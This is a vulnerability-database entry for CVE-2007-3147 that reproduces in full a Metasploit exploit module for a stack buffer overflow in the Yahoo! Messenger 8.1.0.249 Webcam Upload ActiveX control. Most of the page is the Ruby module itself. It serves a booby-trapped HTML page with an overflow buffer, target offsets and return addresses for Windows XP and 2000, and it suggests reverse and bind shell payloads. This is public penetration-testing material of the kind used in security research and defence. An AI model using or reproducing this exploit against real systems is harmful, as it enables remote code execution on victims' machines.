Lucene search
HistoryJun 07, 2007 - 9:32 p.m.
Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending an overly long string to the “Server()” method, and then calling the “Send()” method, an attacker may be able to execute arbitrary code. Using the payloads “windows/shell_bind_tcp” and “windows/shell_reverse_tcp” yield for the best results.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX
Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.
By sending an overly long string to the "Server()" method, and then calling
the "Send()" method, an attacker may be able to execute arbitrary code.
Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp"
yield for the best results.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2007-3147' ],
[ 'OSVDB', '37082' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0/SP1 Pro English', { 'Offset' => 1032, 'Ret' => 0x71aa32ad } ],
[ 'Windows 2000 Pro English All', { 'Offset' => 1032, 'Ret' => 0x75022ac4 } ]
],
'DisclosureDate' => '2007-06-05',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Randomize some things
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# Set the exploit buffer
sploit = rand_text_alpha(target['Offset'] - p.encoded.length) + p.encoded
sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
sploit << [0xe8, -775].pack('CV') + rand_text_alpha(500)
# Build out the message
content = %Q|<html>
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='#{vname}'></object>
<script language='javascript'>
#{strname} = new String('#{sploit}')
#{vname}.server = #{strname}
#{vname}.send()
</script>
</html>
|
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
Related
packetstorm
packetstorm
Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
2009-11-26 00:00:00
exploitdb
exploitdb
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow
2007-06-07 00:00:00
Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)
2010-06-15 00:00:00
Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute
2007-06-08 00:00:00
cve
cve
CVE-2007-3147
2007-06-11 18:30:00
cvelist
cvelist
CVE-2007-3147
2007-06-11 18:00:00
prion
prion
Buffer overflow
2007-06-11 18:30:00
nvd
nvd
CVE-2007-3147
2007-06-11 18:30:00
checkpoint_advisories
checkpoint_advisories
nessus
nessus
Yahoo! Messenger Webcam ActiveX Buffer Overflows
2007-06-11 00:00:00
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
Related for MSF:EXPLOIT-WINDOWS-BROWSER-YAHOOMESSENGER_SERVER-